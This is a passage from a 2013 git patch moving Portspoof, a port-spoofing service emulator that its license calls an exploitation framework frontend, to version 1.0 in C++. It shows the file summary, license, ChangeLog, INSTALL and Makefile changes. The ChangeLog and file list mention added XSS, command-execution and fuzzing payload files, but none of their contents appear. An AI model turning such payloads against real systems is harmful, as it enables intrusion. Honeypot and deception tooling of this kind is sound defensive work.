From 0634acd8888e657210a9bda67804a54a8baa30c2 Mon Sep 17 00:00:00 2001 From: Piotr Duszynski Date: Tue, 30 Jul 2013 10:12:46 +0200 Subject: [PATCH 1/6] Version 1.0 1.0 - 01/08/2013 - Linux * Major release. * Ported to C++. * Example NMAP domino-enum-password NSE, McAffe UTF7 XSS, etc. exploits added . * Fuzzer functionality added. * Many minor improvements and enhancements have been made. --- .travis.yml | 6 - AUTHORS | 6 +- COPYING | 65 +- COPYRIGHT.GPL | 0 ChangeLog | 7 + FAQ | 6 +- INSTALL | 373 +- Makefile.am | 0 Makefile.in | 211 +- NEWS | 2 +- README | 27 +- README.md | 0 TODO | 12 - aclocal.m4 | 322 +- auto/compile | 21 +- auto/config.guess | 161 +- auto/config.sub | 127 +- auto/depcomp | 116 +- auto/install-sh | 225 +- auto/missing | 49 +- autom4te.cache/output.0 | 6412 +++ autom4te.cache/output.1 | 6412 +++ autom4te.cache/requests | 138 + autom4te.cache/traces.0 | 805 + autom4te.cache/traces.1 | 512 + config.h.in | 101 - config.status | 1071 - configure | 6302 +-- configure.in | 12 +- src/.DS_Store | Bin 0 -> 6148 bytes src/.deps/connection.Po | 1 - src/.deps/connection.Tpo | 231 - src/.deps/portspoof-connection.Po | 1 - src/.deps/portspoof-portspoof.Po | 1 - src/.deps/portspoof-revregex.Po | 1 - src/.deps/portspoof.Po | 1 - src/.deps/revregex.Po | 1 - src/Configuration.cpp | 360 + src/Configuration.h | 147 + src/Fuzzer.cpp | 203 + src/Fuzzer.h | 114 + src/Makefile.am | 4 +- src/Makefile.in | 340 +- src/{portspoof.h => Portspoof.cpp} | 58 +- src/Server.cpp | 179 + src/Server.h | 78 + src/{threads.h => Threads.h} | 21 +- src/Utils.cpp | 322 + src/Utils.h | 91 + src/config.h.in | 9 +- src/config_file.c | 163 - src/config_file.h | 9 - src/connection.c | 441 - src/connection.cpp | 259 + src/connection.h | 61 +- src/extra_files/.DS_Store | Bin 0 -> 6148 bytes src/extra_files/XSS.txt | 188 + src/extra_files/cmd_exec.txt | 29 + src/extra_files/fuzz_nmap_signatures | 4 + src/extra_files/fuzz_payloads | 304 + src/log.c | 49 - src/log.h | 5 - src/portspoof.c | 380 - src/portspoof.conf | 15 - src/{revregex.c => revregex.cpp} | 223 +- src/revregex.h | 38 +- src/signatures | 1824 - src/stamp-h1 | 1 - system_files/.DS_Store | Bin 0 -> 6148 bytes system_files/init.d/portspoof.sh | 35 + system_files/iptables-config | 18 + tools/Makefile | 157 +- tools/Makefile.am | 4 +- tools/Makefile.in | 97 +- tools/portspoof.conf | 98 +- tools/portspoof_signatures | 65535 +++++++++++++++++++++++++ tools/signatures | 1866 - 77 files changed, 87204 insertions(+), 10263 deletions(-) delete mode 100644 .travis.yml mode change 100644 => 100755 AUTHORS mode change 100644 => 100755 COPYING mode change 100644 => 100755 COPYRIGHT.GPL mode change 100644 => 100755 ChangeLog mode change 100644 => 100755 FAQ mode change 100644 => 100755 Makefile.am mode change 100644 => 100755 README mode change 100644 => 100755 README.md delete mode 100644 TODO create mode 100644 autom4te.cache/output.0 create mode 100644 autom4te.cache/output.1 create mode 100644 autom4te.cache/requests create mode 100644 autom4te.cache/traces.0 create mode 100644 autom4te.cache/traces.1 delete mode 100644 config.h.in delete mode 100755 config.status mode change 100644 => 100755 configure.in create mode 100755 src/.DS_Store delete mode 100644 src/.deps/connection.Po delete mode 100644 src/.deps/connection.Tpo delete mode 100644 src/.deps/portspoof-connection.Po delete mode 100644 src/.deps/portspoof-portspoof.Po delete mode 100644 src/.deps/portspoof-revregex.Po delete mode 100644 src/.deps/portspoof.Po delete mode 100644 src/.deps/revregex.Po create mode 100755 src/Configuration.cpp create mode 100755 src/Configuration.h create mode 100755 src/Fuzzer.cpp create mode 100755 src/Fuzzer.h mode change 100644 => 100755 src/Makefile.am rename src/{portspoof.h => Portspoof.cpp} (61%) mode change 100644 => 100755 create mode 100755 src/Server.cpp create mode 100755 src/Server.h rename src/{threads.h => Threads.h} (77%) mode change 100644 => 100755 create mode 100755 src/Utils.cpp create mode 100755 src/Utils.h delete mode 100644 src/config_file.c delete mode 100644 src/config_file.h delete mode 100644 src/connection.c create mode 100755 src/connection.cpp mode change 100644 => 100755 src/connection.h create mode 100644 src/extra_files/.DS_Store create mode 100755 src/extra_files/XSS.txt create mode 100755 src/extra_files/cmd_exec.txt create mode 100755 src/extra_files/fuzz_nmap_signatures create mode 100755 src/extra_files/fuzz_payloads delete mode 100644 src/log.c delete mode 100644 src/log.h delete mode 100644 src/portspoof.c delete mode 100644 src/portspoof.conf rename src/{revregex.c => revregex.cpp} (79%) mode change 100644 => 100755 mode change 100644 => 100755 src/revregex.h delete mode 100644 src/signatures delete mode 100644 src/stamp-h1 create mode 100644 system_files/.DS_Store create mode 100644 system_files/init.d/portspoof.sh create mode 100755 system_files/iptables-config mode change 100644 => 100755 tools/Makefile mode change 100644 => 100755 tools/Makefile.am mode change 100644 => 100755 tools/portspoof.conf create mode 100755 tools/portspoof_signatures delete mode 100644 tools/signatures diff --git a/.travis.yml b/.travis.yml deleted file mode 100644 index e1cf65d..0000000 --- a/.travis.yml +++ /dev/null @@ -1,6 +0,0 @@ -language: c -compiler: - - gcc - - clang -# Change this to your needs -script: ./configure && make diff --git a/AUTHORS b/AUTHORS old mode 100644 new mode 100755 index 7e17296..f377a6e --- a/AUTHORS +++ b/AUTHORS @@ -1,4 +1,4 @@ -Portspoof author: +The Portspoof author: -Piotr Duszyński -Twitter: @drk1iwi +Piotr Duszyński piotr[at]duszynski.eu +Twitter: @drk1wi diff --git a/COPYING b/COPYING old mode 100644 new mode 100755 index 780c90f..fa16cf9 --- a/COPYING +++ b/COPYING @@ -1,31 +1,34 @@ -Portspoof license (see COPYRIGHT.GPL for detailed GPL conditions) - -Copyright (C) 2012 Piotr Duszyński - -This program is free software; you can redistribute it and/or modify it under -the terms of the GNU General Public License as published by the Free Software -Foundation; either version 2 of the License, or (at your option) any later -version. - -This program is distributed in the hope that it will be useful, but WITHOUT -ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS -FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. - -You should have received a copy of the GNU General Public License along with -this program; if not, see . - -Linking portspoof statically or dynamically with other modules is making -a combined work based on portspoof. Thus, the terms and conditions of the -GNU General Public License cover the whole combination. - -In addition, as a special exception, the copyright holder of portspoof gives you -permission to combine portspoof with free software programs or libraries that -are released under the GNU LGPL. You may copy and distribute such a system following the -terms of the GNU GPL for portspoof and the licenses of the other code concerned. - -Note that people who make modified versions of portspoof are not obligated to -grant this special exception for their modified versions; it is their choice -whether to do so. The GNU General Public License gives permission to release -a modified version without this exception; this exception also makes it -possible to release a modified version which carries forward this exception. - +/* + * Portspoof - Service Signature Emulator / Exploitation Framework Frontend + * Copyright (C) 2012 Piotr Duszyński + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the + * Free Software Foundation; either version 2 of the License, or (at your + * option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + * See the GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License along + * with this program; if not, see . + * + * Linking portspoof statically or dynamically with other modules is making + * a combined work based on Portspoof. Thus, the terms and conditions of + * the GNU General Public License cover the whole combination. + * + * In addition, as a special exception, the copyright holder of Portspoof + * gives you permission to combine Portspoof with free software programs or + * libraries that are released under the GNU LGPL. You may copy + * and distribute such a system following the terms of the GNU GPL for + * Portspoof and the licenses of the other code concerned. + * + * Note that people who make modified versions of Portspoof are not obligated + * to grant this special exception for their modified versions; it is their + * choice whether to do so. The GNU General Public License gives permission + * to release a modified version without this exception; this exception + * also makes it possible to release a modified version which carries + * forward this exception. + */ diff --git a/COPYRIGHT.GPL b/COPYRIGHT.GPL old mode 100644 new mode 100755 diff --git a/ChangeLog b/ChangeLog old mode 100644 new mode 100755 index 8b24cba..447f7fb --- a/ChangeLog +++ b/ChangeLog @@ -1,3 +1,10 @@ +1.0 - 01/08/2013 - Linux +* Major release. +* Ported to C++. +* Example NMAP domino-enum-password NSE, McAffe UTF7 XSS, etc. exploits added . +* Fuzzer functionality added. +* Many minor improvements and enhancements have been made. + 0.3 28/09/2012 * Configuration file * Droppped BSD support due to time constraints diff --git a/FAQ b/FAQ old mode 100644 new mode 100755 index bbdfa50..bbc3556 --- a/FAQ +++ b/FAQ @@ -1,2 +1,6 @@ 1. I have found a bug where should I report it? - piotr [at] duszynski.eu \ No newline at end of file + + portspoof.org mailing list ( http://portspoof.org/cgi-bin/mailman/listinfo/portspoof-users ) + + piotr [at] duszynski.eu + diff --git a/INSTALL b/INSTALL index 5fb7a19..7d1c323 100644 --- a/INSTALL +++ b/INSTALL @@ -1,26 +1,365 @@ -Portspoof Unix install notes +Installation Instructions +************************* -1. Compile the software: +Copyright (C) 1994, 1995, 1996, 1999, 2000, 2001, 2002, 2004, 2005, +2006, 2007, 2008, 2009 Free Software Foundation, Inc. - ./configure - make - make install + Copying and distribution of this file, with or without modification, +are permitted in any medium without royalty provided the copyright +notice and this notice are preserved. This file is offered as-is, +without warranty of any kind. -2. Configure your firewall rules: +Basic Installation +================== - Linux : + Briefly, the shell commands `./configure; make; make install' should +configure, build, and install this package. The following +more-detailed instructions are generic; see the `README' file for +instructions specific to this package. Some packages provide this +`INSTALL' file but do not implement all of the features documented +below. The lack of an optional feature in a given package is not +necessarily a bug. More recommendations for GNU packages can be found +in *note Makefile Conventions: (standards)Makefile Conventions. - # iptables -A PREROUTING -i eth0 -p tcp -m tcp --dport 8080:10000 -j REDIRECT --to-ports 4444 - Portspoof by default will listen on port ALL_INTERFACES:4444 - This FW rules will result in service obfuscation for port range from 8080 to 10000 - $ ./portspoof. + The `configure' shell script attempts to guess correct values for +various system-dependent variables used during compilation. It uses +those values to create a `Makefile' in each directory of the package. +It may also create one or more `.h' files containing system-dependent +definitions. Finally, it creates a shell script `config.status' that +you can run in the future to recreate the current configuration, and a +file `config.log' containing compiler output (useful mainly for +debugging `configure'). - BSD : + It can also use an optional file (typically called `config.cache' +and enabled with `--cache-file=config.cache' or simply `-C') that saves +the results of its tests to speed up reconfiguring. Caching is +disabled by default to prevent problems with accidental use of stale +cache files. - $ ulimit -n 512 - $ pass in on em0 inet proto tcp from any to any port 5000:5500 flags S/SA rdr-to 127.0.0.1 port 4444 - $ ./portspoof + If you need to do unusual things to compile the package, please try +to figure out how `configure' could check whether to do them, and mail +diffs or instructions to the address given in the `README' so they can +be considered for the next release. If you are using the cache, and at +some point `config.cache' contains results you don't want to keep, you +may remove or edit it. -3. Add portspoof invocation to your system's startup scripts. + The file `configure.ac' (or `configure.in') is used to create +`configure' by a program called `autoconf'. You need `configure.ac' if +you want to change it or regenerate `configure' using a newer version +of `autoconf'. + + The simplest way to compile this package is: + + 1. `cd' to the directory containing the package's source code and type + `./configure' to configure the package for your system. + + Running `configure' might take a while. While running, it prints + some messages telling which features it is checking for. + + 2. Type `make' to compile the package. + + 3. Optionally, type `make check' to run any self-tests that come with + the package, generally using the just-built uninstalled binaries. + + 4. Type `make install' to install the programs and any data files and + documentation. When installing into a prefix owned by root, it is + recommended that the package be configured and built as a regular + user, and only the `make install' phase executed with root + privileges. + + 5. Optionally, type `make installcheck' to repeat any self-tests, but + this time using the binaries in their final installed location. + This target does not install anything. Running this target as a + regular user, particularly if the prior `make install' required + root privileges, verifies that the installation completed + correctly. + + 6. You can remove the program binaries and object files from the + source code directory by typing `make clean'. To also remove the + files that `configure' created (so you can compile the package for + a different kind of computer), type `make distclean'. There is + also a `make maintainer-clean' target, but that is intended mainly + for the package's developers. If you use it, you may have to get + all sorts of other programs in order to regenerate files that came + with the distribution. + + 7. Often, you can also type `make uninstall' to remove the installed + files again. In practice, not all packages have tested that + uninstallation works correctly, even though it is required by the + GNU Coding Standards. + + 8. Some packages, particularly those that use Automake, provide `make + distcheck', which can by used by developers to test that all other + targets like `make install' and `make uninstall' work correctly. + This target is generally not run by end users. + +Compilers and Options +===================== + + Some systems require unusual options for compilation or linking that +the `configure' script does not know about. Run `./configure --help' +for details on some of the pertinent environment variables. + + You can give `configure' initial values for configuration parameters +by setting variables in the command line or in the environment. Here +is an example: + + ./configure CC=c99 CFLAGS=-g LIBS=-lposix + + *Note Defining Variables::, for more details. + +Compiling For Multiple Architectures +==================================== + + You can compile the package for more than one kind of computer at the +same time, by placing the object files for each architecture in their +own directory. To do this, you can use GNU `make'. `cd' to the +directory where you want the object files and executables to go and run +the `configure' script. `configure' automatically checks for the +source code in the directory that `configure' is in and in `..'. This +is known as a "VPATH" build. + + With a non-GNU `make', it is safer to compile the package for one +architecture at a time in the source code directory. After you have +installed the package for one architecture, use `make distclean' before +reconfiguring for another architecture. + + On MacOS X 10.5 and later systems, you can create libraries and +executables that work on multiple system types--known as "fat" or +"universal" binaries--by specifying multiple `-arch' options to the +compiler but only a single `-arch' option to the preprocessor. Like +this: + + ./configure CC="gcc -arch i386 -arch x86_64 -arch ppc -arch ppc64" \ + CXX="g++ -arch i386 -arch x86_64 -arch ppc -arch ppc64" \ + CPP="gcc -E" CXXCPP="g++ -E" + + This is not guaranteed to produce working output in all cases, you +may have to build one architecture at a time and combine the results +using the `lipo' tool if you have problems. + +Installation Names +================== + + By default, `make install' installs the package's commands under +`/usr/local/bin', include files under `/usr/local/include', etc. You +can specify an installation prefix other than `/usr/local' by giving +`configure' the option `--prefix=PREFIX', where PREFIX must be an +absolute file name. + + You can specify separate installation prefixes for +architecture-specific files and architecture-independent files. If you +pass the option `--exec-prefix=PREFIX' to `configure', the package uses +PREFIX as the prefix for installing programs and libraries. +Documentation and other data files still use the regular prefix. + + In addition, if you use an unusual directory layout you can give +options like `--bindir=DIR' to specify different values for particular +kinds of files. Run `configure --help' for a list of the directories +you can set and what kinds of files go in them. In general, the +default for these options is expressed in terms of `${prefix}', so that +specifying just `--prefix' will affect all of the other directory +specifications that were not explicitly provided. + + The most portable way to affect installation locations is to pass the +correct locations to `configure'; however, many packages provide one or +both of the following shortcuts of passing variable assignments to the +`make install' command line to change installation locations without +having to reconfigure or recompile. + + The first method involves providing an override variable for each +affected directory. For example, `make install +prefix=/alternate/directory' will choose an alternate location for all +directory configuration variables that were expressed in terms of +`${prefix}'. Any directories that were specified during `configure', +but not in terms of `${prefix}', must each be overridden at install +time for the entire installation to be relocated. The approach of +makefile variable overrides for each directory variable is required by +the GNU Coding Standards, and ideally causes no recompilation. +However, some platforms have known limitations with the semantics of +shared libraries that end up requiring recompilation when using this +method, particularly noticeable in packages that use GNU Libtool. + + The second method involves providing the `DESTDIR' variable. For +example, `make install DESTDIR=/alternate/directory' will prepend +`/alternate/directory' before all installation names. The approach of +`DESTDIR' overrides is not required by the GNU Coding Standards, and +does not work on platforms that have drive letters. On the other hand, +it does better at avoiding recompilation issues, and works well even +when some directory options were not specified in terms of `${prefix}' +at `configure' time. + +Optional Features +================= + + If the package supports it, you can cause programs to be installed +with an extra prefix or suffix on their names by giving `configure' the +option `--program-prefix=PREFIX' or `--program-suffix=SUFFIX'. + + Some packages pay attention to `--enable-FEATURE' options to +`configure', where FEATURE indicates an optional part of the package. +They may also pay attention to `--with-PACKAGE' options, where PACKAGE +is something like `gnu-as' or `x' (for the X Window System). The +`README' should mention any `--enable-' and `--with-' options that the +package recognizes. + + For packages that use the X Window System, `configure' can usually +find the X include and library files automatically, but if it doesn't, +you can use the `configure' options `--x-includes=DIR' and +`--x-libraries=DIR' to specify their locations. + + Some packages offer the ability to configure how verbose the +execution of `make' will be. For these packages, running `./configure +--enable-silent-rules' sets the default to minimal output, which can be +overridden with `make V=1'; while running `./configure +--disable-silent-rules' sets the default to verbose, which can be +overridden with `make V=0'. + +Particular systems +================== + + On HP-UX, the default C compiler is not ANSI C compatible. If GNU +CC is not installed, it is recommended to use the following options in +order to use an ANSI C compiler: + + ./configure CC="cc -Ae -D_XOPEN_SOURCE=500" + +and if that doesn't work, install pre-built binaries of GCC for HP-UX. + + On OSF/1 a.k.a. Tru64, some versions of the default C compiler cannot +parse its `' header file. The option `-nodtk' can be used as +a workaround. If GNU CC is not installed, it is therefore recommended +to try + + ./configure CC="cc" + +and if that doesn't work, try + + ./configure CC="cc -nodtk" + + On Solaris, don't put `/usr/ucb' early in your `PATH'. This +directory contains several dysfunctional programs; working variants of +these programs are available in `/usr/bin'. So, if you need `/usr/ucb' +in your `PATH', put it _after_ `/usr/bin'. + + On Haiku, software installed for all users goes in `/boot/common', +not `/usr/local'. It is recommended to use the following options: + + ./configure --prefix=/boot/common + +Specifying the System Type +========================== + + There may be some features `configure' cannot figure out +automatically, but needs to determine by the type of machine the package +will run on. Usually, assuming the package is built to be run on the +_same_ architectures, `configure' can figure that out, but if it prints +a message saying it cannot guess the machine type, give it the +`--build=TYPE' option. TYPE can either be a short name for the system +type, such as `sun4', or a canonical name which has the form: + + CPU-COMPANY-SYSTEM + +where SYSTEM can have one of these forms: + + OS + KERNEL-OS + + See the file `config.sub' for the possible values of each field. If +`config.sub' isn't included in this package, then this package doesn't +need to know the machine type. + + If you are _building_ compiler tools for cross-compiling, you should +use the option `--target=TYPE' to select the type of system they will +produce code for. + + If you want to _use_ a cross compiler, that generates code for a +platform different from the build platform, you should specify the +"host" platform (i.e., that on which the generated programs will +eventually be run) with `--host=TYPE'. + +Sharing Defaults +================ + + If you want to set default values for `configure' scripts to share, +you can create a site shell script called `config.site' that gives +default values for variables like `CC', `cache_file', and `prefix'. +`configure' looks for `PREFIX/share/config.site' if it exists, then +`PREFIX/etc/config.site' if it exists. Or, you can set the +`CONFIG_SITE' environment variable to the location of the site script. +A warning: not all `configure' scripts look for a site script. + +Defining Variables +================== + + Variables not defined in a site shell script can be set in the +environment passed to `configure'. However, some packages may run +configure again during the build, and the customized values of these +variables may be lost. In order to avoid this problem, you should set +them in the `configure' command line, using `VAR=value'. For example: + + ./configure CC=/usr/local2/bin/gcc + +causes the specified `gcc' to be used as the C compiler (unless it is +overridden in the site shell script). + +Unfortunately, this technique does not work for `CONFIG_SHELL' due to +an Autoconf bug. Until the bug is fixed you can use this workaround: + + CONFIG_SHELL=/bin/bash /bin/bash ./configure CONFIG_SHELL=/bin/bash + +`configure' Invocation +====================== + + `configure' recognizes the following options to control how it +operates. + +`--help' +`-h' + Print a summary of all of the options to `configure', and exit. + +`--help=short' +`--help=recursive' + Print a summary of the options unique to this package's + `configure', and exit. The `short' variant lists options used + only in the top level, while the `recursive' variant lists options + also present in any nested packages. + +`--version' +`-V' + Print the version of Autoconf used to generate the `configure' + script, and exit. + +`--cache-file=FILE' + Enable the cache: use and save the results of the tests in FILE, + traditionally `config.cache'. FILE defaults to `/dev/null' to + disable caching. + +`--config-cache' +`-C' + Alias for `--cache-file=config.cache'. + +`--quiet' +`--silent' +`-q' + Do not print messages saying which checks are being made. To + suppress all normal output, redirect it to `/dev/null' (any error + messages will still be shown). + +`--srcdir=DIR' + Look for the package's source code in directory DIR. Usually + `configure' can determine that directory automatically. + +`--prefix=DIR' + Use DIR as the installation prefix. *note Installation Names:: + for more details, including other options available for fine-tuning + the installation locations. + +`--no-create' +`-n' + Run the configure checks, but stop before creating any output + files. + +`configure' also accepts some other, not widely useful, options. Run +`configure --help' for more details. - Modify other relevant startup scripts. diff --git a/Makefile.am b/Makefile.am old mode 100644 new mode 100755 diff --git a/Makefile.in b/Makefile.in index c5e5157..e3544ce 100644 --- a/Makefile.in +++ b/Makefile.in @@ -1,8 +1,9 @@ -# Makefile.in generated by automake 1.10 from Makefile.am. +# Makefile.in generated by automake 1.11.1 from Makefile.am. # @configure_input@ # Copyright (C) 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002, -# 2003, 2004, 2005, 2006 Free Software Foundation, Inc. +# 2003, 2004, 2005, 2006, 2007, 2008, 2009 Free Software Foundation, +# Inc. # This Makefile.in is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. @@ -15,8 +16,9 @@ @SET_MAKE@ VPATH = @srcdir@ pkgdatadir = $(datadir)/@PACKAGE@ -pkglibdir = $(libdir)/@PACKAGE@ pkgincludedir = $(includedir)/@PACKAGE@ +pkglibdir = $(libdir)/@PACKAGE@ +pkglibexecdir = $(libexecdir)/@PACKAGE@ am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd install_sh_DATA = $(install_sh) -c -m 644 install_sh_PROGRAM = $(install_sh) -c @@ -34,7 +36,7 @@ host_triplet = @host@ subdir = . DIST_COMMON = README $(am__configure_deps) $(srcdir)/Makefile.am \ $(srcdir)/Makefile.in $(top_srcdir)/configure AUTHORS COPYING \ - ChangeLog INSTALL NEWS TODO auto/compile auto/config.guess \ + ChangeLog INSTALL NEWS auto/compile auto/config.guess \ auto/config.sub auto/depcomp auto/install-sh auto/missing ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 am__aclocal_m4_deps = $(top_srcdir)/configure.in @@ -45,6 +47,7 @@ am__CONFIG_DISTCLEAN_FILES = config.status config.cache config.log \ mkinstalldirs = $(install_sh) -d CONFIG_HEADER = $(top_builddir)/src/config.h CONFIG_CLEAN_FILES = +CONFIG_CLEAN_VPATH_FILES = SOURCES = DIST_SOURCES = RECURSIVE_TARGETS = all-recursive check-recursive dvi-recursive \ @@ -56,6 +59,9 @@ RECURSIVE_TARGETS = all-recursive check-recursive dvi-recursive \ ps-recursive uninstall-recursive RECURSIVE_CLEAN_TARGETS = mostlyclean-recursive clean-recursive \ distclean-recursive maintainer-clean-recursive +AM_RECURSIVE_TARGETS = $(RECURSIVE_TARGETS:-recursive=) \ + $(RECURSIVE_CLEAN_TARGETS:-recursive=) tags TAGS ctags CTAGS \ + distdir dist dist-all distcheck ETAGS = etags CTAGS = ctags DIST_SUBDIRS = $(SUBDIRS) @@ -63,9 +69,34 @@ DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST) distdir = $(PACKAGE)-$(VERSION) top_distdir = $(distdir) am__remove_distdir = \ - { test ! -d $(distdir) \ - || { find $(distdir) -type d ! -perm -200 -exec chmod u+w {} ';' \ - && rm -fr $(distdir); }; } + { test ! -d "$(distdir)" \ + || { find "$(distdir)" -type d ! -perm -200 -exec chmod u+w {} ';' \ + && rm -fr "$(distdir)"; }; } +am__relativize = \ + dir0=`pwd`; \ + sed_first='s,^\([^/]*\)/.*$$,\1,'; \ + sed_rest='s,^[^/]*/*,,'; \ + sed_last='s,^.*/\([^/]*\)$$,\1,'; \ + sed_butlast='s,/*[^/]*$$,,'; \ + while test -n "$$dir1"; do \ + first=`echo "$$dir1" | sed -e "$$sed_first"`; \ + if test "$$first" != "."; then \ + if test "$$first" = ".."; then \ + dir2=`echo "$$dir0" | sed -e "$$sed_last"`/"$$dir2"; \ + dir0=`echo "$$dir0" | sed -e "$$sed_butlast"`; \ + else \ + first2=`echo "$$dir2" | sed -e "$$sed_first"`; \ + if test "$$first2" = "$$first"; then \ + dir2=`echo "$$dir2" | sed -e "$$sed_rest"`; \ + else \ + dir2="../$$dir2"; \ + fi; \ + dir0="$$dir0"/"$$first"; \ + fi; \ + fi; \ + dir1=`echo "$$dir1" | sed -e "$$sed_rest"`; \ + done; \ + reldir="$$dir2" DIST_ARCHIVES = $(distdir).tar.gz GZIP_ENV = --best distuninstallcheck_listfiles = find . -type f -print @@ -80,6 +111,9 @@ CCDEPMODE = @CCDEPMODE@ CFLAGS = @CFLAGS@ CPP = @CPP@ CPPFLAGS = @CPPFLAGS@ +CXX = @CXX@ +CXXDEPMODE = @CXXDEPMODE@ +CXXFLAGS = @CXXFLAGS@ CYGPATH_W = @CYGPATH_W@ DEFS = @DEFS@ DEPDIR = @DEPDIR@ @@ -106,6 +140,7 @@ PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@ PACKAGE_NAME = @PACKAGE_NAME@ PACKAGE_STRING = @PACKAGE_STRING@ PACKAGE_TARNAME = @PACKAGE_TARNAME@ +PACKAGE_URL = @PACKAGE_URL@ PACKAGE_VERSION = @PACKAGE_VERSION@ PATH_SEPARATOR = @PATH_SEPARATOR@ SET_MAKE = @SET_MAKE@ @@ -117,6 +152,7 @@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ abs_top_srcdir = @abs_top_srcdir@ ac_ct_CC = @ac_ct_CC@ +ac_ct_CXX = @ac_ct_CXX@ am__include = @am__include@ am__leading_dot = @am__leading_dot@ am__quote = @am__quote@ @@ -159,6 +195,7 @@ sharedstatedir = @sharedstatedir@ srcdir = @srcdir@ sysconfdir = @sysconfdir@ target_alias = @target_alias@ +top_build_prefix = @top_build_prefix@ top_builddir = @top_builddir@ top_srcdir = @top_srcdir@ SUBDIRS = src tools @@ -172,15 +209,15 @@ $(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps) @for dep in $?; do \ case '$(am__configure_deps)' in \ *$$dep*) \ - echo ' cd $(srcdir) && $(AUTOMAKE) --gnu '; \ - cd $(srcdir) && $(AUTOMAKE) --gnu \ + echo ' cd $(srcdir) && $(AUTOMAKE) --gnu'; \ + $(am__cd) $(srcdir) && $(AUTOMAKE) --gnu \ && exit 0; \ exit 1;; \ esac; \ done; \ - echo ' cd $(top_srcdir) && $(AUTOMAKE) --gnu Makefile'; \ - cd $(top_srcdir) && \ - $(AUTOMAKE) --gnu Makefile + echo ' cd $(top_srcdir) && $(AUTOMAKE) --gnu Makefile'; \ + $(am__cd) $(top_srcdir) && \ + $(AUTOMAKE) --gnu Makefile .PRECIOUS: Makefile Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status @case '$?' in \ @@ -196,9 +233,10 @@ $(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENC $(SHELL) ./config.status --recheck $(top_srcdir)/configure: $(am__configure_deps) - cd $(srcdir) && $(AUTOCONF) + $(am__cd) $(srcdir) && $(AUTOCONF) $(ACLOCAL_M4): $(am__aclocal_m4_deps) - cd $(srcdir) && $(ACLOCAL) $(ACLOCAL_AMFLAGS) + $(am__cd) $(srcdir) && $(ACLOCAL) $(ACLOCAL_AMFLAGS) +$(am__aclocal_m4_deps): # This directory's subdirectories are mostly independent; you can cd # into them and run `make' without going through this Makefile. @@ -207,7 +245,7 @@ $(ACLOCAL_M4): $(am__aclocal_m4_deps) # (which will cause the Makefiles to be regenerated when you run `make'); # (2) otherwise, pass the desired values on the `make' command line. $(RECURSIVE_TARGETS): - @failcom='exit 1'; \ + @fail= failcom='exit 1'; \ for f in x $$MAKEFLAGS; do \ case $$f in \ *=* | --[!k]*);; \ @@ -224,7 +262,7 @@ $(RECURSIVE_TARGETS): else \ local_target="$$target"; \ fi; \ - (cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) $$local_target) \ + ($(am__cd) $$subdir && $(MAKE) $(AM_MAKEFLAGS) $$local_target) \ || eval $$failcom; \ done; \ if test "$$dot_seen" = "no"; then \ @@ -232,7 +270,7 @@ $(RECURSIVE_TARGETS): fi; test -z "$$fail" $(RECURSIVE_CLEAN_TARGETS): - @failcom='exit 1'; \ + @fail= failcom='exit 1'; \ for f in x $$MAKEFLAGS; do \ case $$f in \ *=* | --[!k]*);; \ @@ -258,16 +296,16 @@ $(RECURSIVE_CLEAN_TARGETS): else \ local_target="$$target"; \ fi; \ - (cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) $$local_target) \ + ($(am__cd) $$subdir && $(MAKE) $(AM_MAKEFLAGS) $$local_target) \ || eval $$failcom; \ done && test -z "$$fail" tags-recursive: list='$(SUBDIRS)'; for subdir in $$list; do \ - test "$$subdir" = . || (cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) tags); \ + test "$$subdir" = . || ($(am__cd) $$subdir && $(MAKE) $(AM_MAKEFLAGS) tags); \ done ctags-recursive: list='$(SUBDIRS)'; for subdir in $$list; do \ - test "$$subdir" = . || (cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) ctags); \ + test "$$subdir" = . || ($(am__cd) $$subdir && $(MAKE) $(AM_MAKEFLAGS) ctags); \ done ID: $(HEADERS) $(SOURCES) $(LISP) $(TAGS_FILES) @@ -275,14 +313,14 @@ ID: $(HEADERS) $(SOURCES) $(LISP) $(TAGS_FILES) unique=`for i in $$list; do \ if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \ done | \ - $(AWK) ' { files[$$0] = 1; } \ - END { for (i in files) print i; }'`; \ + $(AWK) '{ files[$$0] = 1; nonempty = 1; } \ + END { if (nonempty) { for (i in files) print i; }; }'`; \ mkid -fID $$unique tags: TAGS TAGS: tags-recursive $(HEADERS) $(SOURCES) $(TAGS_DEPENDENCIES) \ $(TAGS_FILES) $(LISP) - tags=; \ + set x; \ here=`pwd`; \ if ($(ETAGS) --etags-include --version) >/dev/null 2>&1; then \ include_option=--etags-include; \ @@ -294,46 +332,50 @@ TAGS: tags-recursive $(HEADERS) $(SOURCES) $(TAGS_DEPENDENCIES) \ list='$(SUBDIRS)'; for subdir in $$list; do \ if test "$$subdir" = .; then :; else \ test ! -f $$subdir/TAGS || \ - tags="$$tags $$include_option=$$here/$$subdir/TAGS"; \ + set "$$@" "$$include_option=$$here/$$subdir/TAGS"; \ fi; \ done; \ list='$(SOURCES) $(HEADERS) $(LISP) $(TAGS_FILES)'; \ unique=`for i in $$list; do \ if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \ done | \ - $(AWK) ' { files[$$0] = 1; } \ - END { for (i in files) print i; }'`; \ - if test -z "$(ETAGS_ARGS)$$tags$$unique"; then :; else \ + $(AWK) '{ files[$$0] = 1; nonempty = 